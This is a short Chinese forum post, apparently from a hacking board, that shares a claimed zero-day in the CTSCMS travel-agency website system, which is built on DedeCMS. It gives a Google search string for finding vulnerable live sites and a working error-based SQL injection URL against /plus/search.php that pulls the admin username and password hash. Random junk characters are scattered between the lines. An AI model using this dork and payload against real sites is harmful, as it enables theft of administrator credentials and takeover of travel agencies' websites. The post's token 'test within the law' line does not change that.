新年多放点0day,小范围共享!4 n( P; `, X' T7 ?4 ? ]# q
中国旅游服务网站管理系统CTSCMS,这个网站系统是我在近期发现的。使用dedecms二次开发的,织梦内核。由于忽视了官方的系统升级导致程序有很多的漏洞。近期爆出的注入漏洞都存在,历史的漏洞不知道是否存在。
( B X8 ^- X4 XGoogle:2002-2011 CTSCMS.COM ,inurl:users/reg.php 旅行社/ y$ @* c L& _6 J4 f
POC:/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
' b/ \; ?( ~5 Z! m, R ^2 a+ w8 b3 M: c
后来我又发现,这套程序都是一个人在做 国内很多旅行社网站在用
0 {/ A- d% u( |6 l5 z$ ?1 M5 `; W5 ?! \+ D) k3 r
1 E. r7 Z! b6 s0 z; `# y6 R2 c- i
2 H4 E- ?3 _" {3 x
! [9 n0 g9 _. K( k1 F* Q% o
8 c0 T6 N$ \5 _很多大型旅行社网站都在用,请在法律允许的范围内测试。 黑客保重....
- t, s' ~) e$ k) {$ d7 D7 p9 }: e
! _/ D/ u7 Y9 t9 ]& M |